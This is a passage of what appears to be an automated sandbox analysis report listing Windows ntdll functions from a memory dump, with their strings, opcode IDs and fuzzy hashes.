                                                  • LdrpInitializeTls, xrefs: 36DC1A47
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36DC1A51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 0114afd473727339faa97148457da40328ff62bfb7e6e96aa25a2572ec7d28c6
                                                  • Instruction ID: 37f8b13d0eaf27eb9e190b47596cd39d316b9dca10c72038e0147aeb88ddc652
                                                  • Opcode Fuzzy Hash: 0114afd473727339faa97148457da40328ff62bfb7e6e96aa25a2572ec7d28c6
                                                  • Instruction Fuzzy Hash: ED31E271E10216FBF7118B65CC4AF5A7BB9EB80354F150169E684BB180DB70AD4ECBE0
                                                  Strings
                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36D9127B
                                                  • @, xrefs: 36D912A5
                                                  • BuildLabEx, xrefs: 36D9130F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 0-3051831665
                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                  • Instruction ID: b9bf6fadb6c902c37b9ea27c1e662b414ccf0c44961cffad844d1e2850507783
                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                  • Instruction Fuzzy Hash: 43319F7290061DAFDB11DFA5CD40EDEBBF9EB84764F404025E914AB2A0D730DA05CBA5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: RtlValidateHeap
                                                  • API String ID: 3446177414-1797218451
                                                  • Opcode ID: 52286b88893c67b7b18a1e5841324c2ec02ecd65ec76b5de70639d9b5038b532
                                                  • Instruction ID: 7da1591e977d5e15bf0209bc7a32a29539c75698d09fb2c8f19a0bfa9924865a
                                                  • Opcode Fuzzy Hash: 52286b88893c67b7b18a1e5841324c2ec02ecd65ec76b5de70639d9b5038b532
                                                  • Instruction Fuzzy Hash: AF412676F043959FEB02DF74C8947BDBBB2BF80214F588659D851AB280CB349A05DBA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: kLsE
                                                  • API String ID: 3446177414-3058123920
                                                  • Opcode ID: a19aef5df28430c6ffeee6c9b6904bbb9d5b91d404f5b9a71a6ee8d5e5c1de5d
                                                  • Instruction ID: 04c0f121339af3ce58e358772c50e9845403c6e8bcded975ebb2afd401fb1398
                                                  • Opcode Fuzzy Hash: a19aef5df28430c6ffeee6c9b6904bbb9d5b91d404f5b9a71a6ee8d5e5c1de5d
                                                  • Instruction Fuzzy Hash: 2E415C7292235087E712AF71DC88BA53BA5EB40754F220569EF50AE1C1C7B6449FCBB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: 1ff2a9009a7ac8454afc44bf51f0d06e4d9a032e1a02efe413ab9d75b60d6ea9
                                                  • Instruction ID: c127892f039569e56e14d797764bed0d89d8aa64d4d974fa4e1a877b76aab03b
                                                  • Opcode Fuzzy Hash: 1ff2a9009a7ac8454afc44bf51f0d06e4d9a032e1a02efe413ab9d75b60d6ea9
                                                  • Instruction Fuzzy Hash: 3332A0B89083518BEB14CF16C98073EB7F1EF89748F90491EF985972A4E774D894CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 72996a99846c028ecda205d922d2fe838f940d08accf8e164aea949fb785262d
                                                  • Instruction ID: 0929e347f9870b5a6ebce91ea3cbdee213e24edb4888903b1ed2388307b10a23
                                                  • Opcode Fuzzy Hash: 72996a99846c028ecda205d922d2fe838f940d08accf8e164aea949fb785262d
                                                  • Instruction Fuzzy Hash: F231EE35A11B12EFEB429F20CE80A89F7BAFF44388F515025EA4157E50DB70E921CBD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 50e34551db103af0c411f25dde763f45df242423420e2102bd9623ef5a56edf2
                                                  • Instruction ID: b740bd04d6a075031d197669960ea6213b8dcd781e2dedc51553285c1c2042ec
                                                  • Opcode Fuzzy Hash: 50e34551db103af0c411f25dde763f45df242423420e2102bd9623ef5a56edf2
                                                  • Instruction Fuzzy Hash: 1261DEB1E01B89DBEB20CFA6C980B9DB7B2FF4430CF904469D515AF650CB34A945CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: f374889117d14fab8d130942974566fbfc0b9ee8851bab6f2aa26fce29f1e053
                                                  • Instruction ID: 2241c0f00ceea5573123f0e107d23a66cdb9cbec4e8d25772aff7078b0b8df7f
                                                  • Opcode Fuzzy Hash: f374889117d14fab8d130942974566fbfc0b9ee8851bab6f2aa26fce29f1e053
                                                  • Instruction Fuzzy Hash: A531DA756083819BD301CB3AD854B2AB3E4EF85758F42286DF984CB790EB30D905CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: bc676bcaf4802411d694b6524bced15a31b277448d7bbbdf48581e115996e5f0
                                                  • Instruction ID: 2a9b3b957301661598eab7b3bc16924844057f305189e54e5f9a833b2d87780f
                                                  • Opcode Fuzzy Hash: bc676bcaf4802411d694b6524bced15a31b277448d7bbbdf48581e115996e5f0
                                                  • Instruction Fuzzy Hash: DA3192B55093049FE311CF69C884A5BBBF8EB85658F41092EF99C83610DA30DD04CBA2
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36DC2A95
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 36DC2A90
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 2403f48cba2f36e82fa448e88955235acaeca96ad7a1b61e540fb721374e7b28
                                                  • Instruction ID: aa5425af4318b98695afcdf09cdd5ac1cde5f46f22cfa3cbc8069397966d84a7
                                                  • Opcode Fuzzy Hash: 2403f48cba2f36e82fa448e88955235acaeca96ad7a1b61e540fb721374e7b28
                                                  • Instruction Fuzzy Hash: F4112976B00214FBF7258B8D8D45F5B76A9DBC8B58F258069B908EB250D675CD00C6E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[6@[6
                                                  • API String ID: 0-1493792968
                                                  • Opcode ID: c1257064948172b02564ae8e2eb438b5caf3656cf0218299eee93796320cfea8
                                                  • Instruction ID: 344ef5231a78344189cda40bab6068b5a5166cd557b9df2d17b340480576ec0f
                                                  • Opcode Fuzzy Hash: c1257064948172b02564ae8e2eb438b5caf3656cf0218299eee93796320cfea8
                                                  • Instruction Fuzzy Hash: 5732B0B5E00219DBDF14CFA9C890BEEBBB1FF48758F140029E945AB390E7359951CB92
                                                  APIs
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 36E23356
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CallFilterFunc@8
                                                  • String ID:
                                                  • API String ID: 4062629308-0
                                                  • Opcode ID: 9c43c4a5b6e2979762b4270c3d6feec9e95d0e12a221a20422adbc311a973bf3
                                                  • Instruction ID: 8ecd255a9deb3bb400bf60dab580784aad9a1f3070da6c99f8935960407b7522
                                                  • Opcode Fuzzy Hash: 9c43c4a5b6e2979762b4270c3d6feec9e95d0e12a221a20422adbc311a973bf3
                                                  • Instruction Fuzzy Hash: 3FC127B99017298FDB20DF1AC984699FBF6FF88318F5081AED54DA7250D734AA85CF40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 35ba4d6613ff4f1006077eedd2289ae929595c2c55f6c4c2283633914034074d
                                                  • Instruction ID: e1fb79506fb2bf0e87dfa5adc210cc93efebdffa38d663ad4d49ef7e13b86dfc
                                                  • Opcode Fuzzy Hash: 35ba4d6613ff4f1006077eedd2289ae929595c2c55f6c4c2283633914034074d
                                                  • Instruction Fuzzy Hash: F5B122B59093408FD754CF29C980A5AFBF1BF88304F5449AEE899CB352D771E845CB92
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2205807a587f11a9dc51f2b082ce4212b60416863649a1efe817104a58f132f7
                                                  • Instruction ID: f5764adfaaafbdeb219cd9f18d2a90c0637af820c7f97cef164fdde2863b55e6
                                                  • Opcode Fuzzy Hash: 2205807a587f11a9dc51f2b082ce4212b60416863649a1efe817104a58f132f7
                                                  • Instruction Fuzzy Hash: D8A17E75A08341DFE710CF29C484A1ABBF6FF88354F21496DE68597750EB30E945CB92
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7939e1f146cb00cf1149b8466f06991780ce2814b54fedcfa58a9eb7490b2b8
                                                  • Instruction ID: edfc136974f0adb911c32105eb2353ed28180ca33fac3f9c701f83631bacecd5
                                                  • Opcode Fuzzy Hash: d7939e1f146cb00cf1149b8466f06991780ce2814b54fedcfa58a9eb7490b2b8
                                                  • Instruction Fuzzy Hash: 6A615E75E00606AFEF08CF79C884A9DFBB5FF88244F25826AD519A7300DB30A955CBD1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35118722127871bacbe47829ae9642f80a4f525e030793149be371b85aa107c5
                                                  • Instruction ID: 38ee190199bfa2c936845aa2fd0c8c9ef521df27c4176d23604b20246f52a91d
                                                  • Opcode Fuzzy Hash: 35118722127871bacbe47829ae9642f80a4f525e030793149be371b85aa107c5
                                                  • Instruction Fuzzy Hash: 61414BB4D01288DFDB11CFAAC881AADBBF5BF49390F50426ED598A7211D7319905CFA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 3517ad063066a3870b3240839ef243697d75d0e3f5d5f2606bb9f1cd4e006286
                                                  • Instruction ID: 5279042ceee4aed7987d7af075d0ea83e543299b22333d4a4187f762a7d1f63d
                                                  • Opcode Fuzzy Hash: 3517ad063066a3870b3240839ef243697d75d0e3f5d5f2606bb9f1cd4e006286
                                                  • Instruction Fuzzy Hash: A33155729003049FC312EF28C840A66B7B5FF843A8F514669ED445B291CB31ED02CFE0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 609c4b4169eea56f4833e83c9205ed884acc0d397776141b5700168f9cbf3d64
                                                  • Instruction ID: 13325aa66104312d3cab4a33406910d72c846647e557d1788548e8d4eecc3ac7
                                                  • Opcode Fuzzy Hash: 609c4b4169eea56f4833e83c9205ed884acc0d397776141b5700168f9cbf3d64
                                                  • Instruction Fuzzy Hash: 3431AF39A25A05FFEB469B24DE40A89BBA6FF84344F516025EA5187F50DB31E830CBD1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 64189622f46deaa59af990cd2d36b5d5f564990e55d02ac5ba5d97bc7ecaa6c2
                                                  • Instruction ID: 757862af05d21ec5306438e15eb6eb29924593271da8311d9c144bc6424a37e2
                                                  • Opcode Fuzzy Hash: 64189622f46deaa59af990cd2d36b5d5f564990e55d02ac5ba5d97bc7ecaa6c2
                                                  • Instruction Fuzzy Hash: 102104759053509FDB229F16C948B1ABBA1FF80B15F93046DEA404BE50EB74E848CBD2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 08a70f0b169d8bae7434400d47c1d1fb573a9548f66ffd83ff9e1b84d18580ad
                                                  • Instruction ID: 6e7c9cd58dcaf350a4f5817206b7ba2d57d3bce17aceca94e8dcd353c1190670
                                                  • Opcode Fuzzy Hash: 08a70f0b169d8bae7434400d47c1d1fb573a9548f66ffd83ff9e1b84d18580ad
                                                  • Instruction Fuzzy Hash: 06F0F032104240ABD732AB1ACC08F8ABBEDEF85710F190118F54693590CAA0B909C660
                                                  Strings
                                                  • System Volume Information, xrefs: 36DFDEBE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: System Volume Information
                                                  • API String ID: 0-764423717
                                                  • Opcode ID: dce170f1a0cf50a057b159552faece6d1f6744b994c76ce52a9963efb0aa82c6
                                                  • Instruction ID: 7def8283f8e3fb1031646d80a9dc26b83fcbb8e8da1a4246ad9369245225e26c
                                                  • Opcode Fuzzy Hash: dce170f1a0cf50a057b159552faece6d1f6744b994c76ce52a9963efb0aa82c6
                                                  • Instruction Fuzzy Hash: 3B61BB71118355AFD321DF51CC80EABB7E9EF88B94F41082DF9819B2A0D675DD44CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction ID: 275b453014e4a1e550f873d0fc3adbafc83ed04502c255f36ecd04cd636f1a4a
                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction Fuzzy Hash: 65618CB6D01359AFEF11CF96C840BEEBBB4FF80754F11012AE911AB654D7748A01CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
• Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction ID: ef581032521166db8eb4d6e76efd4af96d8102ab32a9e0d4c5bf65a0aea65eaa
                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction Fuzzy Hash: C15187B2914745AFE7119F56CC50F6BB7E8FF84B54F400929F9809B290DBB4E904CBA2
                                                  Similarity
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Similarity
                                                  • String ID: PreferredUILanguages
                                                  • API String ID: 0-1884656846
                                                  Similarity
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  Similarity
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D50058
                                                  Similarity
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                  • API String ID: 0-996340685
                                                  Similarity
                                                  • String ID: g6
                                                  • API String ID: 0-3127300404
                                                  Similarity
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  Similarity
                                                  • String ID: LdrCreateEnclave
                                                  • API String ID: 0-3262589265
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca2be2f3bd3e5f67e6befd00bf743ea2ee73452b627a3debe810c36105e7d291
                                                  • Instruction ID: 05a713f4f28cac7f0d03bf47660f861b2a6ffd23045412bf1536d6c826e11abd
                                                  • Opcode Fuzzy Hash: ca2be2f3bd3e5f67e6befd00bf743ea2ee73452b627a3debe810c36105e7d291
